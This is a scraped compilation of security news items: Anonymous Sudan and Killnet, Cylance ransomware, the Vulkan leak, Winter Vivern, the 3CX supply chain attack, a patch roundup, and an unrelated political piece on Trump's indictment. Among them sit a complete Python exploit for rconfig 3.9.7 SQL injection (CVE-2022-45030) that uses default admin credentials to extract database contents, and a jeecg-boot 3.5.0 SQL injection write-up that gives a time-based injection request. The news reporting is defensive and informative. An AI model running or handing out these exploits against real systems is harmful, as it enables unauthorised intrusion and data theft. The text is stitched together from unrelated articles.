"Anonymous Sudan" has been claiming that its DDoS attacks are in retaliation for anti-Islamic activities, but at least one security vendor is suspicious about its true motives.

An apparently pro-Islamic group that has hit numerous targets in Europe with distributed denial of service (DDoS) attacks over the past few months may actually be a subgroup of the Russian hacktivist collective known as Killnet.

The group, which calls itself "Anonymous Sudan," has claimed responsibility for recent DDoS attacks against targets in France, Germany, the Netherlands, and Sweden. All the attacks were apparently in retaliation for perceived anti-Islamic activity in each of these countries. The attacks on Swedish government and business entities, for instance, followed an incident of Quran-burning in Stockholm. The same, or similar, reason was the trigger for DDoS attacks against Dutch government agencies and an attack on Air France, where the group — in a break from character — stole data from the airline's website rather than DDoSing it.

**Anonymous Sudan's Killnet Links**

Researchers from Trustwave, who have been tracking Anonymous Sudan for the past several months, this week said there is some evidence to suggest the group is a front for Killnet. In a report, Trustwave said its researchers have not been able to confirm if Anonymous Sudan is, in fact, based in Sudan or if any of its members are from that country. The group's Telegram posts are in Russian and English, and other telemetry instead point to at least some of its members being Eastern European.

Just as with Killnet, all of Anonymous Sudan's targets have been in countries that have opposed Russia's invasion of Ukraine and/or have assisted the latter in some way. It's most recent threat — on March 24 — to attack targets in Australia fits into the same patterns, as does a DDoS attack against Israeli cybersecurity vendor Radware.

Also just like Killnet, Anonymous Sudan has mostly employed DDoS attacks to send its message to intended targets. And both Killnet and Anonymous Sudan have made claims on their respective Telegram channels that officially connect to each other. In January for instance, Anonymous Sudan claimed to have assisted Killnet in a DDoS attack against Germany's Federal Intelligence Service, Trustwave said.

Just why Anonymous Sudan would brand itself as a pro-Islamic group rather than a pro-Russian group allied with — or possibly a part of — Killnet remains unclear, according to Trustwave researchers. "Anonymous Sudan has been extremely active taking credit for attacks via its Telegram channel, but details concerning the true reasoning behind its efforts remain murky."

**A Noisy Hacktivist Collective**

Killnet itself is a noisy hacktivist group, that, in the months since Russia's invasion of Ukraine, has hit, or claimed to hit, numerous organizations worldwide in DDoS attacks. The group has described the attacks as retaliation against the US-led support for Ukraine in the war — and indeed, all of its victims have been in countries that have rallied behind Ukraine. Most of its attacks so far have been on organizations in Europe. But in February, Killnet launched DDoS attacks against more than one dozen major US hospitals, including Stanford Health, Michigan Medicine, Duke Health, and Cedar-Sinai. Last October, the group launched DDoS attacks against multiple US airports, including Los Angeles International Airport (LAX), Chicago O'Hare, and the Hartsfield-Jackson Atlanta International Airport.

Killnet has touted these attacks as major incidents. But security experts, and victim organizations themselves, have characterized the group as a medium severity threat at worst, but one that however cannot be ignored. Following Killnet's attacks on US hospitals, for instance, the American Health Association (AHA) described Killnet's attacks as typically not causing much damage but on occasion having the potential to disrupt services for several days.

Trustwave SpiderLabs security researcher Jeannette Dickens-Hale characterizes the threat that Anonymous Sudan presents the same way. 

"Based on Anonymous Sudan's recent DDoS attacks, its connection to, and similarity in tactics techniques, and procedures (TTPs) to Killnet, it appears that the group has a low to medium sophistication level," she says. "Killnet, conveniently just like Anonymous Sudan, mainly launches DDoS attacks and threatens extortion with data they may or may not have." 

Trustwave SpiderLabs assesses that Killnet has the same threat level. Anonymous Sudan's recent attack against Air France and the threat to sell its data — that it may or may not actually have — could indicate an escalation in motivation and attack type, Dickens-Hale says.

**Killnet's "Black Skills" Launch**

Killnet's incessant attempts to drum up support for its efforts — mostly through exaggerated claims of its successes — are another thing that researchers are keeping an eye on. Flashpoint this week, for instance, reported observing Killnet's leader "Killmilk" announcing the creation of a private military hacking outfit called "Black Skills".

The security vendor assessed that Killmilk's description of Black Skills was an attempt to position Killnet as the cyber equivalent of Russian mercenary operation the Wagner Group. Earlier in March, Killnet also announced a DDoS-as-a-service offering called "Black Listing" that Flashpoint perceived as another attempt by the collective to carve a more formal identity for itself. 

"Black Skills/Black Listing appear to be an attempt from Killnet to establish itself as a corporate identity," Flashpoint researchers concluded. "According to our intelligence, the new group will be organized and structured, with subgroups taking care of payroll, public relations and technical support, pen testing, as well as data collection, analysis, information operations, and hits against priority targets."

Pro-Islam 'Anonymous Sudan' Hacktivists Likely a Front for Russia's Killnet Operation

By Waqas
For now, Cylance ransomware is still in its early stages, yet it has already claimed several victims.
This is a post from HackRead.com Read the original post: New Cylance Ransomware Targets Linux and Windows, Warn Researchers

Do not confuse Cylance Ransomware with the Blackberry-owned Cylance cybersecurity company.

The cybersecurity researchers at Palo Alto Networks Unit 42 have discovered a new strain of Cylance Ransomware, which has already claimed several victims. Researchers noticed it early Friday morning, and further probing revealed that it is targeting Linux and Windows devices.

As of now, insufficient information is available about Cylance Ransomware, indicating that it is a relatively recent emergence. The ransom note received by victims was published by Unit 42 which contains the attackers’ email addresses, but surprisingly not the ransom amount. Here is the content of the ransom note:

“All your files are encrypted, and currently unusable, but you need to follow our instructions. Otherwise, you can’t return your data (never. It’s just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities – nobody will cooperate with us. It’s not in our interests.”

“To check the ability of returning files, we decrypt one file for free. That is our guarantee. If you will not cooperate with our service – for us, it does not matter. But you will lose time and data, cause just we have the private key. time is more valuable than money.”

It is believed that the amount will be disclosed to the victim when they contact the attacker. The attackers have warned against any attempt to restore or change the files, as it would destroy the private key, which means the data will be lost forever.

**Attack Methodology**

In a tweet, researchers explained that the modus operandi of the ransomware attack involves encrypting files and appending them with a “.Cylance” extension. In addition, a text file titled “Read Me” is added to all encrypted files’ folders. This file contains the attacker’s ransom note.

**Who is Distributing Cylance Ransomware?**

For your information, Cylance is actually a cybersecurity company owned by BlackBerry Ltd. The company is known for mitigating and preventing ransomware attacks on enterprise organizations. However, why threat actors named the ransomware after this company is unclear, or it could be that they are looking for extra attention or to negatively impact Cylance in the long run.

Although Cylance ransomware is still in its early stages, it will be crucial to monitor its targets and wait for more information from the infosec community. Currently, samples of the ransomware are available on MalwareBazaar, a project by abuse.ch that shares malware samples with the infosec community, AV vendors, and threat intelligence providers.

1.  95.6% of Malware in 2022 Targeted Windows
2.  Lessons from Holy Ghost ransomware attacks
3.  CryWiper poses as ransomware to target Russia
4.  Royal Ransomware: New Threat Uses Google Ads
5.  Alert against AXLocker, Octocrypt, Alice ransomware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

New Cylance Ransomware Targets Linux and Windows, Warn Researchers

Russian intelligence services, together with a Moscow-based IT company, are planning worldwide hacking operations that will also enable attacks on critical infrastructure facilities.

The release of thousands of pages of confidential documents has exposed Russian military and intelligence agencies' grand plans for using their cyberwar capabilities in disinformation campaigns, hacking operations, critical infrastructure disruption, and control of the Internet.

The papers were leaked from the Russian contractor NTC Vulkan and show how Russian intelligence agencies use private companies to plan and execute global hacking operations. They include project plans, software descriptions, instructions, internal emails, and transfer documents from the company.

The takeover of railroad networks and power plants are also part of a training seminar held by Vulkan to train hackers.

The leak also exposes the company's close links to the FSB, Russia's domestic spy agency, the GOU and GRU, the respective operational and intelligence divisions of the armed forces, and the SVR, Russia's foreign intelligence organization.

The documents, which were leaked by an unnamed source to a German reporter working for the Süddeutsche Zeitung at the start of Russia's invasion of Ukraine, have since been analyzed by global media outlets including The Washington Post and German media outlets Paper Trail Media and Der Spiegel.

According to the Spiegel report (in German), Vulkan has developed tools that allow state hackers to efficiently prepare cyberattacks, filter Internet traffic, and spread propaganda and disinformation on a massive scale.

The Spiegel report notes that analysts from Google reportedly discovered a connection between Vulkan and the hacker group Cozy Bear years ago; the group has successfully penetrated systems of the US Department of Defense in the past.

**Amezit, Skan-V Programs Revealed**

One offensive cyber program described in the documents is internally codenamed "Amezit."

The wide-ranging platform is designed to enable attacks on critical infrastructure facilities in addition to total information control over specific areas.

The program's goals include using special software to derail trains or paralyze airport computers, but it was not clear from the materials whether the program is currently being used against Ukraine.

Another project, called "Skan-V," is supposed to automate cyberattacks and make them much easier to plan.

Whether and where the programs were used cannot be traced, but the documents prove that the programs were ordered, tested, and paid for.

"People should know the dangers this poses," shared the anonymous source who leaked the docs to the media. The Russian invasion of Ukraine had motivated the source to make the documents public.

**As the Sandworm Turns**

A trail also leads to the state hacker group Sandworm, one of the most dangerous advanced persistent threats (APTs) in the world, responsible for some of the most serious cyberattacks of recent years. For instance, the threat actor has been targeting the Ukrainian capital since as far back as December 2016 when it used the malware tool Industroyer to cause a temporary power outage in Kyiv.

Until now, it was not known that the group used tools from private companies.

Sandworm has previously been linked to GRU.

Since the start of the war, at least five Russian, state-sponsored or cybercriminal groups — including Gamaredon, Sandworm, and Fancy Bear — have targeted Ukrainian government agencies and private companies in dozens of operations that aimed to disrupt services or steal sensitive information.

Vulkan Playbook Leak Exposes Russia's Plans for Worldwide Cyberwar

rconfig version 3.9.7 suffers from a remote SQL injection vulnerability.

    # Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)# Exploit Author: azhen# Date: 10/12/2022# Vendor Homepage: https://www.rconfig.com/# Software Link: https://www.rconfig.com/# Vendor: rConfig# Version: <= v3.9.7# Tested against Server Host: Linux# CVE: CVE-2022-45030import requestsimport sysimport urllib3urllib3.disable_warnings()s = requests.Session()# sys.argv.append("192.168.10.150") #Enter the hostnameif len(sys.argv) != 2:    print("Usage: python3 rconfig_sqli_3.9.7.py <host>")    sys.exit(1)host=sys.argv[1] #Enter the hostnamedef get_data(host):    print("[+] Get db data...")    vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"    query_exp = "database()"    result_data = ""    for i in range(1, 100):        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}        res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)        # print(res.text)        a = chr(int(res.text[6:10]) - 1000)        if a == '\x00':            break        result_data += a                print(result_data)        print("[+] Database name: {}".format(result_data))    '''    output:    [+] Logging in...    [+] Get db data...    r    rc    rco    rcon    rconf    rconfi    rconfig    rconfigd    rconfigdb    [+] Database name: rconfigdb            '''def login(host):    print("[+] Logging in...")    url = "https://"+host+":443/lib/crud/userprocess.php"    headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}        data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin    response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)    get_data(host)login(host)

rconfig 3.9.7 SQL Injection

The advanced persistent threat (APT) actor known as Winter Vivern is now targeting officials in Europe and the U.S. as part of an ongoing cyber espionage campaign.
"TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe," Proofpoint

The advanced persistent threat (APT) actor known as **Winter Vivern** is now targeting officials in Europe and the U.S. as part of an ongoing cyber espionage campaign.

"TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe," Proofpoint said in a new report.

The enterprise security firm is tracking the activity under its own moniker **TA473** (aka UAC-0114), describing it as an adversarial crew whose operations align with that of Russian and Belarussian geopolitical objectives.

What it lacks in sophistication, it makes up for in persistence. In recent months, the group has been linked to attacks targeting state authorities of Ukraine and Poland as well as government officials in India, Lithuania, Slovakia, and the Vatican.

The NATO-related intrusion wave entails the exploitation of CVE-2022-27926 (CVSS score: 6.1), a now-patched medium-severity security flaw in Zimbra Collaboration that could enable unauthenticated attackers to execute arbitrary JavaScript or HTML code.

This also involves employing scanning tools like Acunetix to identify unpatched webmail portals belonging to targeted organizations with the goal of sending phishing email under the guise of benign government agencies.

The messages come with booby-trapped URLs that exploit the cross-site scripting (XSS) flaw in Zimbra to execute custom Base64-encoded JavaScript payloads within the victims' webmail portals to exfiltrate usernames, passwords, and access tokens.

It's worth noting that each JavaScript payload is tailored to the targeted webmail portal, indicating that the threat actor is willing to invest time and resources to reduce the likelihood of detection.

"TA473's persistent approach to vulnerability scanning and exploitation of unpatched vulnerabilities impacting publicly facing webmail portals is a key factor in this actor's success," Proofpoint said.

"The group's focus on sustained reconnaissance and painstaking study of publicly exposed webmail portals to reverse engineer JavaScript capable of stealing usernames, passwords, and CSRF tokens demonstrates its investment in compromising specific targets."

The findings come amid revelations that at least three Russian intelligence agencies, including FSB, GRU (linked to Sandworm), and SVR (linked to APT29), likely use software and hacking tools developed by a Moscow-based IT contractor named NTC Vulkan.

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

This includes frameworks like Scan (to facilitate large-scale data collection), Amesit (to conduct information operations and manipulate public opinion), and Krystal-2B (to simulate coordinated IO/OT attacks against rail and pipeline control systems).

"Krystal-2B is a training platform that simulates OT attacks against different types of OT environments in coordination with some IO components by leveraging Amesit 'for the purpose of disruption,'" Google-owned Mandiant said.

"The contracted projects from NTC Vulkan provide insight into the investment of Russian intelligence services into developing capabilities to deploy more efficient operations within the beginning of the attack lifecycle, a piece of operations often hidden from our view," the threat intelligence firm said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Winter Vivern APT Targets European Government Entities with Zimbra Vulnerability

Enterprise communications software maker 3CX on Thursday confirmed that multiple versions of its desktop app for Windows and macOS are affected by a supply chain attack.
The version numbers include 18.12.407 and 18.12.416 for Windows and 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 for macOS.
The company said it's engaging the services of Google-owned Mandiant to review the incident. In the

Cyber Threat / Supply Chain Attack

Enterprise communications software maker 3CX on Thursday confirmed that multiple versions of its desktop app for Windows and macOS are affected by a supply chain attack.

The version numbers include **18.12.407 and 18.12.416** for Windows and **18.11.1213, 18.12.402, 18.12.407, and 18.12.416** for macOS.

The company said it's engaging the services of Google-owned Mandiant to review the incident. In the interim, it's urging its customers of self-hosted and on-premise versions of the software to update to version 18.12.422.

"3CX Hosted and StartUP users do not need to update their servers as we will be updating them over the night automatically," 3CX CEO Nick Galea said in a post on Thursday. "Servers will be restarted and the new Electron App MSI/DMG will be installed on the server."

Evidence available so far points to either a compromise of 3CX's software build pipeline to distribute Windows and macOS versions of the app package, or alternatively, the poisoning of an upstream dependency. The scale of the attack is currently unknown.

The earliest period of potentially malicious activity is said to have been detected on or around March 22, 2023, according to a post on the 3CX forum, although preparations for the campaign are said to have commenced no later than February 2022.

3CX said the initial alert flagging a potential security problem in its app last week was treated as a "false positive" owing to the fact that none of the antivirus engines on VirusTotal labeled it as suspicious or malware.

The Windows version of the attack leveraged a technique called DLL side-loading to load a rogue library referred to as "ffmpeg.dll" that's designed to read encrypted shellcode from another DLL called "d3dcompiler\_47.dll."

This involved accessing a GitHub repository to retrieve an ICO file containing URLs hosting the final-stage payload, an information stealer (dubbed ICONIC Stealer or SUDDENICON) capable of harvesting system information and sensitive data stored in web browsers.

"The choice of these two DLLs – ffmpeg and d3dcompiler\_47 – by the threat actors behind this attack was no accident," ReversingLabs security researcher Karlo Zanki said.

"The target in question, 3CXDesktopApp, is built on the Electron open source framework. Both of the libraries in question usually ship with the Electron runtime and, therefore, are unlikely to raise suspicion within customer environments."

SUDDENICON downloading a new executable

The macOS attack chain, in the same vein, bypassed Apple's notarization checks to download an unknown payload from a command-and-control (C2) server that's currently unresponsive.

"The macOS version does not use GitHub to retrieve its C2 server," Volexity said, which is tracking the activity under the cluster UTA0040. "Instead, a list of C2 servers is stored in the file encoded with a single byte XOR key, 0x7A."

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

Cybersecurity firm CrowdStrike, in an advisory of its own, has attributed the attack with high confidence to Labyrinth Chollima (aka Nickel Academy), a North Korea-aligned state-sponsored actor.

"The activity, which targets many organizations across a broad range of verticals without any obvious patterns, has been attributed to Labyrinth Chollima based on observed network infrastructure uniquely associated with that adversary, similar installation techniques, and a reused RC4 key," Adam Meyers, senior vice president of intelligence at CrowdStrike, told The Hacker News.

"The trojanized 3CX applications invoke a variant of ArcfeedLoader, malware uniquely attributed to Labyrinth Chollima."

Labyrinth Chollima, per the Texas-based company, is a subset of the Lazarus Group, which also constitutes Silent Chollima (aka Andariel or Nickel Hyatt) and Stardust Chollima (aka BlueNoroff or Nickel Gladstone).

The group "has been active at least since 2009 and typically tries to generate revenue by targeting crypto and financial organizations," Meyers said, adding it's "likely affiliated with Bureau 121 of the DPRK's Reconnaissance General Bureau (RGB) and primarily conducts espionage operations and revenue generation schemes."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

3CX Supply Chain Attack — Here's What We Know So Far

Plus: Microsoft Outlook and Android patch serious flaws, Chrome and Firefox get fixes, and much more.

Meanwhile, researchers at Google’s Project Zero have reported 18 zero-day vulnerabilities in Exynos Modems made by Samsung. The four most severe—CVE-2023-24033, CVE-2023-26496, CVE-2023-26497, and CVE-2023-26498—allow internet-to-baseband remote code execution, the researchers wrote in a blog. “Tests conducted by Project Zero confirm that the four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim’s phone number,” they wrote. 

Affected devices include those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12, and A04 series, as well as Google’s Pixel 6 and Pixel 7 series.

Patch timelines will vary per manufacturer, but affected Pixel devices have received a fix for all four of the severe internet-to-baseband remote code execution vulnerabilities. In the meantime, users with affected devices can protect themselves by turning off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings, Google said.

Google Chrome 

Google has released Chrome 111 of its popular browser, fixing eight security flaws, seven of which are memory safety bugs with a high severity rating. Four use-after-free vulnerabilities include a high-severity issue tracked as CVE-2023-1528 in Passwords and CVE-2023-1529, an out-of-bounds memory access flaw in WebHID.

Meanwhile, CVE-2023-1530 is a use-after-free bug in PDF reported by the UK’s National Cyber Security Centre, and CVE-2023-1531 is a high-severity use-after-free vulnerability in ANGLE.

None of the issues are known by Google to have been used in attacks, but given their impact, it makes sense to update Chrome when you can.

Cisco

Enterprise software giant Cisco has published the twice-yearly security bundle for its IOS and IOS XE Software, fixing 10 vulnerabilities. Six of the issues fixed by Cisco are rated as having a high impact, including CVE-2023-20080, a denial of service flaw, and CVE-2023-20065, a privilege escalation bug.

At the start of the month, Cisco fixed multiple vulnerabilities in the web-based management interface of some Cisco IP Phones that could allow an unauthenticated, remote attacker to execute arbitrary code or cause denial of service. With a CVSS score of 9.8, the worst is CVE-2023-20078, a vulnerability in the web-based management interface of Cisco IP Phone 6800, 7800, and 8800 series multiplatform phones. 

An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface, Cisco said, adding, “A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system of an affected device.”

Firefox

Privacy-conscious developer Mozilla has released Firefox 111, fixing 13 vulnerabilities, seven of which are rated as having a high impact. These include three flaws in Firefox for Android, including CVE-2023-25749, which may have resulted in third-party apps opening without a prompt.

Meanwhile, two memory safety bugs, CVE-2023-28176 and CVE-2023-28177, have been fixed in Firefox 111. “Some of these bugs showed evidence of memory corruption, and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla said.

SAP

It’s another month of big updates for software maker SAP, which has released 19 new security notes in its March Security Patch Day guidance. Issues fixed during the month include four with a CVSS score of over 9. 

One of the worst of these is CVE-2023-25616, a code injection vulnerability in SAP Business Objects Business Intelligence Platform. This vulnerability in the Central Management Console allows an attacker to inject arbitrary code with a “strong negative impact” on the integrity, confidentiality, and availability of the system, security firm Onapsis said.

Finally, with a CVSS score of 9.9, CVE-2023-23857 is an improper access control bug in SAP NetWeaver AS for Java. “The vulnerability allows an unauthenticated attacker to attach to an open interface and make use of an open naming and directory API to access services,” Onapsis said.

Apple's iOS 16.4: Security Updates Are Better Than a Goose Emoji

A vulnerability was found in jeecg-boot 3.5.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file SysDictMapper.java of the component Sleep Command Handler. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-224629 was assigned to this vulnerability.

**SQL injection exists in the background interface of Jeecg-boot 3.5.0****Environmental Deployment**

Download source code

https://github.com/jeecgboot/jeecg-boot/releases/tag/v3.5.0

Deploy source code through idea

Configure pom and reload dependencies

Green Leaf Launch Project Appears  

**Vulnerability mining**

global search ${

jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/mapper/xml/SysDictMapper.xml

There are variable splicing statements in line 106

Click on the duplicate CheckCountSqlNoDataId tag to jump to SysDictMapper.java for the statement with variable splicing in line 106

jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/mapper/SysDictMapper.java

After clicking the duplicateCheckCountSqlNoDataId method, jump to the DuplicateCheckController controller

jeecg-boot-3.5.0/jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/DuplicateCheckController.java

The general meaning of the code logic is that the get method accepts parameters and uses the SqlInjectionUtil method on line 55 to filter keywords, but does not filter sleep

The front-end access interface was tested and found to require X-Access-Token, otherwise it cannot be accessed

**Obtain the verification code image**

http://192.168.1.103:8080/jeecg-boot/sys/randomImage/9169ea44fee2e773df644053d67c94a1

**Copy body data to browser**

**Access background login address**

http://192.168.1.103:8080/jeecg-boot/sys/login

The get method is not supported, burpsuite packet capturing is changed to post

**Get token**

Get token and add Content Type: application/json Add post data

    {
    	"username":"admin",
    	"password":"123456",
    	"remember_me":"true",
    	"captcha":"mYUw",
    	"checkKey":"9169ea44fee2e773df644053d67c94a1"
    }
    

**Access Vulnerability Interface**

http://192.168.1.103:8080/jeecg-boot/#/default/%E9%87%8D%E5%A4%8D%E6%A0%A1%E9%AA%8C/doDuplicateCheckUsingGET

Set X-Access Token

Sending data and capturing packets

Normal data without delay

Enter and% 09sleep (5) for a delay time of five seconds

This is a packet

    GET /jeecg-boot/sys/duplicate/check?dataId=2000&fieldName=1+and%09sleep(5)&fieldVal=1000&tableName=sys_log HTTP/1.1
    Host: 192.168.1.103:8080
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    knife4j-gateway-code: ROOT
    X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2Nzk2NDM4OTUsInVzZXJuYW1lIjoiYWRtaW4ifQ.xJCpEt2pg3Zs5MdMYwcggZ85uLZcziQm_Ed1RQyC0kU
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.51
    Request-Origion: Knife4j
    Referer: http://192.168.1.103:8080/jeecg-boot/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
    Connection: close
    

**Repair plan**

These keywords such as and sleep if are also filtered.

CVE-2023-1741: report/README.md at main · private-null/report

A Manhattan grand jury has issued the first-ever indictment of a former US president. Buckle up for whatever happens next.

The literally unprecedented indictment against Donald Trump marks an outright dangerous—and politically fraught—moment for the United States and serves as a reminder of the unparalleled level of criminality and conspiracy that surrounded the 2016 election.

It’s easy to look back at the 2016 election as though its outcome was inevitable—that Hillary Clinton was too weak of a candidate, one whose years of high-priced speeches had made her lose touch with the working-class voters of Wisconsin and Pennsylvania; that “but her emails” and Jim Comey’s repeated, inappropriate, and misguided meddling in the election turned the tide. But the new indictment of Trump is an important historical corrective, a moment that makes clear how the US, as a country, must reckon with the fact that Trump’s surprise victory was aided by not one but _two_ separate criminal conspiracies.

In the 2016 race’s final push, in an election that came down to incredibly narrow victories in just three states—10,704 voters in Michigan, 46,765 in Pennsylvania, and 22,177 in Wisconsin—and where Trump lost the overall popular vote by some 3 million votes, he was helped along by a massive and wide-ranging official Russian government operation. That effort was funded in part by oligarch Yevgeny Prigozhin, who is now behind the brutal combat of his Wagner Group mercenary army in Ukraine, which targeted US social media companies and activists on the ground. According to the US Department of Justice’s exhaustive report, in the second arm of the Russian operation, the military intelligence service GRU hacked top Democratic officials, leaked their emails, and shifted the national narrative around Clinton and other Democrats. (Not to mention that this gave rise to the Pizzagate conspiracy theory and, arguably, QAnon.) 

Then there was the separate criminal conspiracy that was the subject of today’s new indictment in New York: the plot in the final weeks of the 2016 election by Trump’s campaign, Trump family fixer Michael Cohen, and the _National Enquirer_ to pay hush money to bury stories of two of the candidate’s affairs, including infamously one with porn star Stormy Daniels. 

While it may seem like news of such an affair would have ended up being a nothingburger amid the campaign’s final weeks, it’s worth remembering the specific context that Cohen and the Trump orbit faced in those finals hours of the campaign. They were performing a fraught and knife’s-edge balancing act to hold onto support from conservatives and evangelicals in the wake of the devastating _Access Hollywood_ tape, a moment where vice presidential nominee Mike Pence seriously considered throwing in the towel himself. The follow-on of more non-family-values-friendly stories might well have begun an unrecoverable spiral. (It’s also worth remembering the still-suspicious interplay of these two threads: how, on a single Friday in October 2016, US intelligence leaders announced publicly for the first time that Russia was behind the election meddling, the _Washington Post_ scooped the existence of the lewd _Access Hollywood_ tape. And then, hours later, Wikileaks began dumping a fresh set of stolen emails from Clinton campaign chair John Podesta.)

The new criminal case related to that second Stormy Daniels conspiracy, brought by Manhattan district attorney Alvin Bragg, also is a reminder of the historic mistake by the US Justice Department to not pursue its own charges against Trump in the same matter. This was a mind-boggling abdication of responsibility given that the Justice Department—in the midst of Donald Trump’s own presidency, no less!—prosecuted Cohen for the same conspiracy, naming Trump in the charges against Cohen as “Individual 1” and, according to a new book by Elie Honig, outlined in a draft indictment Trump’s personal direction and involvement in the case.

According to the book by Honig, himself a former prosecutor, the Southern District of New York ultimately decided to drop any case against Trump after the president left office in January 2021 because, in part, they figured that bigger, more serious investigations were ahead stemming from the January 6 insurrection, which “made the campaign finance violations seem somehow trivial and outdated by comparison.” It was then, and stands now, a serious miscalculation, one that will currently contribute to the democratically untenable “Ford Principle” that presidents stand outside the law both while in office and after. 

Of course, it’s here that we come to what a fraught moment, politically and for American democracy, the historically novel indictment of a former president presents for us in the weeks and months ahead: The true test for Donald Trump and our country is not this particular case but whatever might come next. The New York charges might be the start of multiple criminal cases that would burden Trump even as he begins his phoenix-like presidential reelection bid.

There are signs that Georgia’s Fulton County district attorney is weighing “imminent” charges against Trump, potentially as part of a larger conspiracy, for his well-documented efforts to overturn the state’s election results in 2020. Meanwhile, Justice Department special counsel Jack Smith is zeroing in on potential charges surrounding Trump’s involvement in the January 6 insurrection and related election-meddling schemes, as well as Trump’s attempts to purloin and retain classified documents in Mar-a-Lago after his presidency. Just in recent days, in the classified documents case, a federal judge ruled that there was evidence of a crime that would allow Smith to pierce normal attorney-client privilege and force one of Trump’s lawyers to testify amid evidence that the lawyer participated in that potential crime.

The specter of these indictments has made Trump fire up his always-overheated rhetoric, threatening “death and destruction” if he’s indicted, posting a photo of Bragg and Trump holding a baseball bat, and generally sashaying around the country like a mafioso saying, “Nice country you have here, shame if something happened to it.” His opening campaign rally was in Waco, Texas, amid the 30th anniversary of a 51-day federal siege of a religious cult after the largest shoot-out in US law enforcement history. That standoff left four ATF agents dead and, following the horrific fiery end of the siege, more than 80 members of the Branch Davidian sect dead too. The event helped inspire the bombing of the Alfred P. Murrah Federal Building in Oklahoma City just two years later by a white supremacist, far-right extremist. 

It’s hard not to read Trump’s rally as anything less than a call to arms for his supporters amid the government’s moves against him.

For now, though, the country will wait—and wonder whether the next shoe to drop is more criminal charges or the beginnings of more Trump-inspired violence.

Trump’s Indictment Marks a Historic Reckoning

In a Solar Winds-like attack, compromised, digitally signed versions of 3CX DesktopApp are landing on user systems via the vendor's update mechanism.

Security researchers are sounding the alarm on what may well be another major SolarWinds or Kaseya-like supply chain attack, this time involving Windows and Mac versions of a widely used video conferencing, PBX, and business communication app from 3CX.

On March 30, multiple security vendors said they had observed legitimate, digitally signed versions of the 3CX DesktopApp bundled with malicious installers landing on user desktops via the company's official automatic update process, as well as via manual updates. The end result is a data-stealing malware being implanted as part of a likely cyber-espionage effort by an advanced persistent threat (APT) actor.

The potential impact of the new threat could be huge. 3CX claims some 600,000 installations worldwide with over 12 million daily users. Among its numerous big-name customers are companies like American Express, Avis, Coca Cola, Honda, McDonald's, Pepsi, and Toyota.

CrowdStrike assessed that the threat actor behind the campaign is Labyrinth Chollima, a group that many researchers believe is linked with the cyber-warfare unit of North Korea's intelligence agency, the Reconnaissance General Bureau (RGB). Labyrinth Chollima is one of four groups that CrowdStrike has assessed are part of North Korea's larger Lazarus Group.

The threat is still very much an active one. "Currently, the very latest installers and updates available on the public 3CX website are still the compromised and backdoored applications that are noted as known bad by numerous security firms," says John Hammond, senior security researcher at Huntress.

**Enterprise App Trojanized With Malicious Installers**

The weaponized app arrives on a host system when the 3CX Desktop Application automatically updates, or when a user grabs the latest version proactively. Once pushed to a system, the signed 3CX DesktopApp executes a malicious installer, which then beacons out to an attacker-controlled server, pulls down a second-stage, information-stealing malware from there, and installs it on the user's computer. CrowdStrike, one of the first to report on the threat on March 29, said in a few instances it had also observed malicious hands-on-keyboard activity on systems with the Trojanized 3CX app.

